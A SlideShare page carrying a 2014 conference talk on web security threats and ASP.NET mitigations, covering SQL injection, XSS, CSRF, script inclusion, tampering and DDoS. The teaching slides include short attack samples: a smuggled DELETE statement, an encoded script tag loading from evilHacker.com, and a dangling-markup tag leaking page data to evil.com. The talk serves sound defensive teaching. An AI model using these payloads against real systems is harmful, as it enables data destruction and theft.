SlideShare a Scribd company logo

Web Security Threats and Solutions

Ivo Andreev
Ivo Andreev

Have you heard the words : "Why would anyone hack me?". Security is a serious problem that is often taken for granted and neglected by the product owners in favour of reliability and availability. In addition there are not many developers that are aware of the threats and the long-term harms that a simple attack could do. This session covers the most common web security threats on Web applications like XSS, XSRF, XSI, tampering, leakage, SQL injection and suggests mitigation solutions and coding guidelines.

Software
1 of 41
Download to read offline
var title = “Web Security Threats and Solutions”; var info = { name: “Ivelin Andreev”, otherOptional: “Security is not for granted” Sofia NovN 2o3v ,2 23,0 210414 };
Nov 23, 2014 About me • Project Manager @ o 12 years professional experience o .NET Web Development MCPD o SQL Server 2012 (MCSA) • Business Interests o Web Development, SOA, Integration o Security & Performance Optimization o Horizon2020, Open BIM, GIS, Mapping • Contact me o ivelin.andreev@icb.bg o www.linkedin.com/in/ivelin o www.slideshare.net/ivoandreev
Nov 23, 2014 Web Security is Important Common misconceptions • I am using ASP.NET ?!?! • I am too small to be noticed by crackers • I am too busy for security, my brand is important • I am not operating in the financial industry • Security seal means nothing for customers • Hosting provider does not matter
Nov 23, 2014 agenda(); • SQL Injection • Cross-Site Scripting (CSS) • Cross-Site Request Forgery (CSRF) • Cross-Site Script Inclusion (CSSI) • Parameter Tampering • Information Leakage • Distributed Denial of Service • Demo
SQL injection is so old... Nov 23, 2014 Don’t developers know any better?
Nov 23, 2014 SQL Injection Def: Commands or logic inserted in SQL data channel • Common Reasons o Dynamic query statements and string operations o Poor programming • Impact o Leak or loss of data o Authentication and authorization • Impact (you many have not considered) o Damages limited only by the SQL account permissions o Windows authentication user rights can be exploited o Modify server security configuration o Install backdoors
Nov 23, 2014
Nov 23, 2014 (Pseudo) Solutions • Replace special symbols (-, “, ‘) o Data with special symbols not searchable o Poor routines can create vulnerable query (i.e. –’–) • Smuggling o Looks like a quote but not a quote - conversion on DB level o OWASP_IL_2007_SQL_Smuggling.pdf • NOSQL is not vulnerable o NOSQL is also vulnerable (i.e. MongoDB with JavaScript) • Second order attacks o Validate request only o Data stored in the DB and later used in prepared queries
Using Parameters (in wrong manner) Nov 23, 2014 • Dynamic queries (sp_executesql vs. EXEC) o exec (@sqlString) – executes T-SQL string o sp_executesql allows for statements to be parameterized o sp_executesql is more secure in terms of SQL injection • Developer believes dynamic SQL is the only option CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS DECLARE @sql nvarchar(255) SET @sql = 'SELECT UserName FROM Users ' + @Sort EXECUTE sp_executesql @sql GO o What if @Sort = ‘‘; DELETE FROM Users’ CREATE PROCEDURE GetUsers @Sort Int AS SELECT UserName FROM Users ORDER BY CASE WHEN @Sort = 1 THEN ( Rank() OVER (ORDER BY UserName ASC) ) END GO
Nov 23, 2014 Prevention & Mitigation • Parameterized queries and prepared statements o Use parameters where data are expected o ORMs use parameters (Nhibernate, Entity Framework) • “The least privilege” principle o Grant the minimum access rights o Parameterized queries vs. Stored Procedure permissions • Positive input validation (Poor) o Regular expressions / White lists (i.e. alphanumeric) • IIS Request Query Filtering (Poor) o filtering-for-sql-injection-on-iis-7-and-later • SQL injection and DB takeover o http://ha.ckers.org/sqlinjection/ o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
SQL Injection with Entity Framework Nov 23, 2014 • Entity Framework Raw Queries string query = “query” + “SQL injection code” dbContext.Database.SqlQuery<string>(query).ToList(); o Security Considerations (Entity Framework) • IQueryable o Can result in untrusted calls o If provided as a library, can be casted to Context and connection var orders = repository.GetOrders(5); var context = ((ObjectQuery)orders).Context o Use IEnumerable instead
Nov 23, 2014
Nov 23, 2014 Cross Site Scripting (XSS) Def: Untrusted content displayed on page unencoded • Case o evilHacker injects <script> in http://goodSite.com application context • By posting HTML form field • By tricking user to click link with query parameters sent by mail %3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E • XSS Source o Query parameters, HTML form fields o HTML Attributes (onload, onblur) o URI requested and displayed in HTTP 404 page o Data from DB or file system o 3rd party data - RSS feeds or service
Nov 23, 2014 XSS – an Underestimated Threat • Create or access any DOM element • Hijack cookies, credentials or actions • Take control over victim machine Browser Exploitation Framework Project o Open source penetration testing tool o XSS vulnerability allows injection of BeEF o Victim browser is hooked o Perform actions/attacks on behalf of the victim o Exploit system in browser context
Nov 23, 2014 Persisted XSS • Attacker stores malicious data on server • Unvalidated data displayed on page w/o encoding • Store once – run many
Nov 23, 2014 Reflected XSS • Malicious client data is immediately used by server • Unvalidated data displayed on page w/o encoding • Requires social engineering o Convince users to follow a URL (via e-mail or forum comment) • Detection Tools o OWASP Xenotix XSS Exploit Framework o XSS-ME FireFox plugin
Nov 23, 2014 Client XSS & HTML Injection • DOM-based XSS o Malicious data executed as a part of DOM manipulation o Requires social engineering document.write(“ <OPTION value=1>"+document.location.href.substring(…) + ”</OPTION>"); • Dangling Markup HTML injection o Image source w/o closing tag o On load of image – a request is made to attacker’s site <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name=“SecretField" value="12345"> ... '← Normally-occurring apostrophe somewhere in page text o HTML leaks to evil site
Nov 23, 2014 All user input is evil
Nov 23, 2014 XSS Prevention & Mitigation • HTML escape then JavaScript escape • Encode on usage, not appearance o HttpUtility.HtmlEncode(string) o HttpUtility.JavaScriptStringEncode(string) o Microsoft Anti-Cross Site Scripting Library • Use proven sanitizers o Blacklist vs. Whitelist o Valid JavaScript can be created by poor filtering routine <SscriptCscriptRscriptIscriptPscriptTscript>… • Check 3rd party resources (i.e. jQuery plugins) • Analyze places where DOM elements are created o Use document.createElement() rather than $(obj).html()
Built-In XSS Prevention Features (.NET) Nov 23, 2014 • Request Validation o ASP .NET Web Forms: @Page EnableRequestValidation=“true” o ASP .NET MVC: Controller.ValidateRequest=true; o <httpRuntime requestValidationMode=“4.0" /> • Do not turn off request validation o “Easy fix” for HTML editors o Use HTML editors that HTML encode before submission • Reliability o Microsoft advice: Relying solely on built-in request validation is not enough o No known vulnerabilities now (but not in the past) • AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode() o HttpUtility just ensures output does not break HTML o Performance penalty is +0.1 ms/transaction
Nov 23, 2014 Content Security Policy • HTTP Header o Content-Security-Policy: script-src ‘self’ • Features o Whitelist sources of trusted content o Blocks resources from untrusted locations (incl. inline scripts) o Report of blocked resources • Directives o script-src; img-src; media-src; style-src; frame-src; connect-src • Keywords o 'none‘, 'self‘, 'unsafe-inline‘, 'unsafe-eval‘ • Browser support o CanIUse.com CSP?
CSRF has nothing to do with sea-surf Nov 23, 2014
Cross-Site Request Forgery (CSRF) • POST new password in form to GoodSite.com • GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker Nov 23, 2014 Def: Unauthorised commands transmitted from a user whom a website trusts • Synonyms: One-click attack, Session riding • Case o User logs in http://goodSite.com as usual o http://evilHacker.com can o Authenticated because cookies are sent • Impact o EvilHacker.com cannot read DOM but can POST / GET o Act on behalf of the user (i.e. payment) o User access is blocked or stolen
Cross Site Scripting Inclusion (XSSI) Nov 23, 2014 • Case o Exploits <script> element exception to Same Origin Policy o http://goodSite.com includes own <script> for AJAX request o http://evilHacker.com includes the same script • Authenticated because cookies are sent o Server returns JSON wrapped in function call <script type="application/javascript" src= "http://goodSite.com/Svc/Get?callback=parseResponse" /> o SCRIPT evaluated in evilHacker.com context and JSON is stolen parseResponse ({“this”:”is”,”json”:”data”}); • Impact o User data are stolen • Prevention o Check policy of script inclusion
Nov 23, 2014 CSRF Prevention & Mitigation • NONCE token (URL, hidden field) o Checked upon submission o Protected by browser same origin policy • User defined (password, CAPTCHA) • Built-In (ASP.NET) Page.ViewStateUserKey=Session.SessionID o Signs the ViewState with unique user key • Built-In (ASP.NET MVC) o HtmlHelper.AntiForgeryToken() - generates a hidden form field o [ValidateAntiForgeryToken] attribute for controller validation o NOT a single-use token • POST(HTTP) makes attacks harder o Cross domain POSTs can be limited (CORS)
Nov 23, 2014 Parameter tampering
Nov 23, 2014 Parameter Tampering Def: Parameters changed in unintended way Common reasons • Query string; Hidden form fields; • Data-channel interception (M-i-t-M attack) Common Mistakes • Client side validation only • Mismatch with predefined set of values • Not validated access to entities on server (i.e. EntityId=???) • Unprotected data sent to client o Query strings; JavaScript parameters
Tampering Prevention & Mitigation Nov 23, 2014 • Built-In (ASP.NET MVC) - None • Built-In (ASP.NET) • ViewState o Not encrypted by default (Binary serialized, Base64 Encoded) o Do not turn EnableViewstateMac off (Web Farm, X-domain POST) • Event Validation o “Invalid postback or callback argument…” o Not encrypted (Binary serialized, Base64 Encoded) o Do not turn event validation off o Register for event validation protected override void Render(HtmlTextWriter writer) { … Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, “John”); }
Nov 23, 2014 Encryption & Hashing
Nov 23, 2014 Encryption • Protects sensitive data (if stolen) o Credentials; Auth tokens; Configuration; • SQL data encryption o EncryptByPassPhrase o EncryptByCert o EncryptByKey • Application level o AesCryptoService, RijndaelManaged o TripleDESCryptoServiceProvider • Connection string encryption o Machine specific encryption after deploy aspnet_regiis –pe “connectionstrings” –app /[appname] o Decryption done automatically
Nov 23, 2014 Hashing • Irreversible function (MD5, SHA1, SHA256) o MD5 generator: http://www.md5.cz/ o Smaller than the data • Collisions allowed • Usage o Assure information was not changed (tampered) o Protect passwords • Compromising o Good algorithm is always compromised by weak passwords o Brute force (GPU) o Precalculated “Rainbow tables” (Dictionary attack) • http://www.hashkiller.co.uk/md5-decrypter.aspx
Nov 23, 2014 Protecting Hashes • Random Salt o [SecretText][Salt] -> [Hash] o Changes hash value o Invalidates rainbow tables o Slows down brute force attacks • Complex passwords • Slow algorithms • Key stretching (Rfc2898DeriveBytes class) U1 = PRF(Password, Salt) U2 = PRF(Password, U1) ... Uc = PRF(Password, Uc-1) • Outsource sensitive data storage (if possible)
Nov 23, 2014 Information Leakage • Loss of sensitive data o Display trace and log information o Display raw error messages o Google it: inurl: elmah.axd aspxauth o Attacker can profile application and select appropriate attack • Mitigation o Custom error pages <CustomErrors mode=“on” defaultRedirect=“Error.aspx”> o Turn off tracing • Retail mode <deployment retail=“true”/> o Set in machine.config for the whole server o Sets Custom Errors = “on”, Debug = “false” o Trace information is not displayed • Test
Nov 23, 2014 Transport Layer Security
Nov 23, 2014 SSL / TLS • HTTP over SSL prevents packet sniffing • Force SSL for the entire site o Or at least for credentials interchange • ASP.NET MVC: RequireHttpsAttribute o Redirects Request to HTTPS scheme • ASP.NET Web Forms o Requires custom code o https://code.google.com/p/securityswitch/ <securitySwitch mode="RemoteOnly"> <paths> <add path="~/Login.aspx" /> </paths> </securitySwitch>
Nov 23, 2014 Distributed Denial of Service
Nov 23, 2014 Denial of Service Attack DDoS • Anonymous?! o LOIC (Hive mode) o TOR Anonymity Project • Hash DoS (since 2003) o POST params in hash table (with collisions) o Too many hashes = 100% CPU o Patch: Block POST of >1000 form fields Prevention & Mitigation • Dynamic IP restrictions IIS extension o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions • Good logging and diagnostics is essential
Nov 23, 2014 Demo DEMO
Nov 23, 2014 Takeaways • Guidelines & Code Labs o Open Web Application Security Project www.owasp.org o Web App Exploits and Defenses google-gruyere o 2013 Top 10 Web Security Vulnerabilities Top_10_2013 o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25 • Articles o Hack-proofing ASP.NET Web Applications Adam Tuliper o Hash DDoS Hash-Dos-Attack • .NET Source Code referencesource.microsoft.com • Tools o ASafaWeb Analyser asafaweb.com o Website and Web Server Security Testing www.beyondsecurity.com
Nov 23, 2014 Upcoming events ISTA Conference 26-27 November http://istabg.org/ Stay tuned for 2015: Azure Bootcamp http://azure-camp.eu/ UXify Bulgaria http://uxify.org/ SQLSaturday https://www.sqlsaturday.com/ and more js.next();
Nov 23, 2014 Thanks to our Sponsors: Diamond Sponsor: Hosting partner: Gold Sponsors: Silver Sponsors: Technological Partners: Swag Sponsors: Media Partners:

Recommended

Php.ppt
Php.pptPhp.ppt
Php.ppt
Nidhi mishra
 
JSON: The Basics
JSON: The BasicsJSON: The Basics
JSON: The Basics
Jeff Fox
 
RIA and Ajax
RIA and AjaxRIA and Ajax
RIA and Ajax
Schubert Gomes
 
Mobile security
Mobile securityMobile security
Mobile security
dilipdubey5
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Bhandari Hìmáñßhü
 
Malware ppt
Malware pptMalware ppt
Malware ppt
Faiz Khan
 

Recommended

Php.ppt
Php.pptPhp.ppt
Php.ppt
Nidhi mishra
 
JSON: The Basics
JSON: The BasicsJSON: The Basics
JSON: The Basics
Jeff Fox
 
RIA and Ajax
RIA and AjaxRIA and Ajax
RIA and Ajax
Schubert Gomes
 
Mobile security
Mobile securityMobile security
Mobile security
dilipdubey5
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Bhandari Hìmáñßhü
 
Malware ppt
Malware pptMalware ppt
Malware ppt
Faiz Khan
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
Javascript
JavascriptJavascript
Javascript
Manav Prasad
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-Malware
Arpit Mittal
 
Php Presentation
Php PresentationPhp Presentation
Php PresentationManish Bothra
 
Cyber attack
Cyber attackCyber attack
Cyber attack
Manjushree Mashal
 
Asp.net architecture
Asp.net architectureAsp.net architecture
Asp.net architectureIblesoft
 
Importance of cyber security in education sector
Importance of cyber security in education sectorImportance of cyber security in education sector
Importance of cyber security in education sector
Seqrite
 
Http request and http response
Http request and http responseHttp request and http response
Http request and http response
Nuha Noor
 
Ajax ppt
Ajax pptAjax ppt
Ajax ppt
OECLIB Odisha Electronics Control Library
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Ruby on Rails Presentation
Ruby on Rails PresentationRuby on Rails Presentation
Ruby on Rails Presentation
adamcookeuk
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Webservices
WebservicesWebservices
Webservices
Gerard Sylvester
 
Event In JavaScript
Event In JavaScriptEvent In JavaScript
Event In JavaScript
ShahDhruv21
 
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Okan YILDIZ
 
Internet Threats
Internet ThreatsInternet Threats
Internet Threats
DominikaJoanna
 
Web Security
Web SecurityWeb Security
Web Security
Bharath Manoharan
 

More Related Content

What's hot

Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
Javascript
JavascriptJavascript
Javascript
Manav Prasad
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-Malware
Arpit Mittal
 
Cyber attack
Cyber attackCyber attack
Cyber attack
Manjushree Mashal
 
Asp.net architecture
Asp.net architectureAsp.net architecture
Asp.net architectureIblesoft
 
Importance of cyber security in education sector
Importance of cyber security in education sectorImportance of cyber security in education sector
Importance of cyber security in education sector
Seqrite
 
Http request and http response
Http request and http responseHttp request and http response
Http request and http response
Nuha Noor
 
Ajax ppt
Ajax pptAjax ppt
Ajax ppt
OECLIB Odisha Electronics Control Library
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Ruby on Rails Presentation
Ruby on Rails PresentationRuby on Rails Presentation
Ruby on Rails Presentation
adamcookeuk
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Webservices
WebservicesWebservices
Webservices
Gerard Sylvester
 
Event In JavaScript
Event In JavaScriptEvent In JavaScript
Event In JavaScript
ShahDhruv21
 
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Okan YILDIZ
 

What's hot (20)

Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
Javascript
JavascriptJavascript
Javascript
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Malware & Anti-Malware
Malware & Anti-MalwareMalware & Anti-Malware
Malware & Anti-Malware
 
Php Presentation
Php PresentationPhp Presentation
Php Presentation
 
Cyber attack
Cyber attackCyber attack
Cyber attack
 
Asp.net architecture
Asp.net architectureAsp.net architecture
Asp.net architecture
 
Importance of cyber security in education sector
Importance of cyber security in education sectorImportance of cyber security in education sector
Importance of cyber security in education sector
 
Http request and http response
Http request and http responseHttp request and http response
Http request and http response
 
Ajax ppt
Ajax pptAjax ppt
Ajax ppt
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Ruby on Rails Presentation
Ruby on Rails PresentationRuby on Rails Presentation
Ruby on Rails Presentation
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Webservices
WebservicesWebservices
Webservices
 
Event In JavaScript
Event In JavaScriptEvent In JavaScript
Event In JavaScript
 
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...
 

Viewers also liked

Internet Threats
Internet ThreatsInternet Threats
Internet Threats
DominikaJoanna
 
Web Security
Web SecurityWeb Security
Web Security
Bharath Manoharan
 
Lecture 6 web security
Lecture 6 web securityLecture 6 web security
Lecture 6 web security
rajakhurram
 
Web Security
Web SecurityWeb Security
Web Security
Tripad M
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
John Staveley
 
PwC's Unlock data possibilities - infographic
PwC's Unlock data possibilities - infographicPwC's Unlock data possibilities - infographic
PwC's Unlock data possibilities - infographic
PwC
 
Standard Lymphocyte Culture
Standard Lymphocyte Culture Standard Lymphocyte Culture
Standard Lymphocyte Culture
marongen
 
CRM Business Case Template
CRM Business Case Template CRM Business Case Template
CRM Business Case Template
Demand Metric
 
Cloud computing reference architecture from nist and ibm
Cloud computing reference architecture from nist and ibmCloud computing reference architecture from nist and ibm
Cloud computing reference architecture from nist and ibmRichard Kuo
 
Leadership On The Line Power Point
Leadership On The Line Power PointLeadership On The Line Power Point
Leadership On The Line Power Point
ralston2152003
 
Anterior crossbites in primary & mixed dentition Orthodontic courses training...
Anterior crossbites in primary & mixed dentition Orthodontic courses training...Anterior crossbites in primary & mixed dentition Orthodontic courses training...
Anterior crossbites in primary & mixed dentition Orthodontic courses training...
Indian dental academy
 
Anatomia dental 2
Anatomia dental 2Anatomia dental 2
Anatomia dental 2
constanzamercedes
 
How To Design An All-Hands Meeting Your Employees Actually Want to Attend
How To Design An All-Hands Meeting Your Employees Actually Want to AttendHow To Design An All-Hands Meeting Your Employees Actually Want to Attend
How To Design An All-Hands Meeting Your Employees Actually Want to Attend
Andrew Fayad
 
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENTWAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
Ajeesh Mk
 
liquid chromatography - mass spectroscopy (LC-MS)
liquid chromatography - mass spectroscopy (LC-MS)liquid chromatography - mass spectroscopy (LC-MS)
liquid chromatography - mass spectroscopy (LC-MS)akbar siddiq
 
Morfologia Dental Generalidades
Morfologia Dental Generalidades Morfologia Dental Generalidades
Morfologia Dental Generalidades
Luis Cantillo
 
Atlas de anatomia dentaria
Atlas de anatomia dentariaAtlas de anatomia dentaria
Atlas de anatomia dentariaAndrea Acuña
 
Common Core State Standards Math Workgroup Training
Common Core State Standards Math Workgroup TrainingCommon Core State Standards Math Workgroup Training
Common Core State Standards Math Workgroup TrainingDr. Marci Shepard
 
HSM超入門講座
HSM超入門講座HSM超入門講座
HSM超入門講座
Hiroshi Nakamura
 
XENOGRAFTS IN DENTISTRY
XENOGRAFTS IN DENTISTRYXENOGRAFTS IN DENTISTRY
XENOGRAFTS IN DENTISTRY
Dandu Prasad Reddy
 

Viewers also liked (20)

Internet Threats
Internet ThreatsInternet Threats
Internet Threats
 
Web Security
Web SecurityWeb Security
Web Security
 
Lecture 6 web security
Lecture 6 web securityLecture 6 web security
Lecture 6 web security
 
Web Security
Web SecurityWeb Security
Web Security
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
PwC's Unlock data possibilities - infographic
PwC's Unlock data possibilities - infographicPwC's Unlock data possibilities - infographic
PwC's Unlock data possibilities - infographic
 
Standard Lymphocyte Culture
Standard Lymphocyte Culture Standard Lymphocyte Culture
Standard Lymphocyte Culture
 
CRM Business Case Template
CRM Business Case Template CRM Business Case Template
CRM Business Case Template
 
Cloud computing reference architecture from nist and ibm
Cloud computing reference architecture from nist and ibmCloud computing reference architecture from nist and ibm
Cloud computing reference architecture from nist and ibm
 
Leadership On The Line Power Point
Leadership On The Line Power PointLeadership On The Line Power Point
Leadership On The Line Power Point
 
Anterior crossbites in primary & mixed dentition Orthodontic courses training...
Anterior crossbites in primary & mixed dentition Orthodontic courses training...Anterior crossbites in primary & mixed dentition Orthodontic courses training...
Anterior crossbites in primary & mixed dentition Orthodontic courses training...
 
Anatomia dental 2
Anatomia dental 2Anatomia dental 2
Anatomia dental 2
 
How To Design An All-Hands Meeting Your Employees Actually Want to Attend
How To Design An All-Hands Meeting Your Employees Actually Want to AttendHow To Design An All-Hands Meeting Your Employees Actually Want to Attend
How To Design An All-Hands Meeting Your Employees Actually Want to Attend
 
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENTWAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT
 
liquid chromatography - mass spectroscopy (LC-MS)
liquid chromatography - mass spectroscopy (LC-MS)liquid chromatography - mass spectroscopy (LC-MS)
liquid chromatography - mass spectroscopy (LC-MS)
 
Morfologia Dental Generalidades
Morfologia Dental Generalidades Morfologia Dental Generalidades
Morfologia Dental Generalidades
 
Atlas de anatomia dentaria
Atlas de anatomia dentariaAtlas de anatomia dentaria
Atlas de anatomia dentaria
 
Common Core State Standards Math Workgroup Training
Common Core State Standards Math Workgroup TrainingCommon Core State Standards Math Workgroup Training
Common Core State Standards Math Workgroup Training
 
HSM超入門講座
HSM超入門講座HSM超入門講座
HSM超入門講座
 
XENOGRAFTS IN DENTISTRY
XENOGRAFTS IN DENTISTRYXENOGRAFTS IN DENTISTRY
XENOGRAFTS IN DENTISTRY
 

Similar to Web Security Threats and Solutions

Reviewing AngularJS
Reviewing AngularJSReviewing AngularJS
Reviewing AngularJS
Lewis Ardern
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
Duo Security
 
OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!
Lewis Ardern
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
ColdFusionConference
 
NoSQL, no security?
NoSQL, no security?NoSQL, no security?
NoSQL, no security?
wurbanski
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
SecuRing
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
NoSql Injection
NoSql InjectionNoSql Injection
NoSql Injection
NSConclave
 
Making DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring ApplicationsMaking DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring Applications
Hdiv Security
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentation
Mahdi Dolati
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
OmprakashVerma56
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
ColdFusionConference
 

Similar to Web Security Threats and Solutions (20)

Reviewing AngularJS
Reviewing AngularJSReviewing AngularJS
Reviewing AngularJS
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
a
aa
a
 
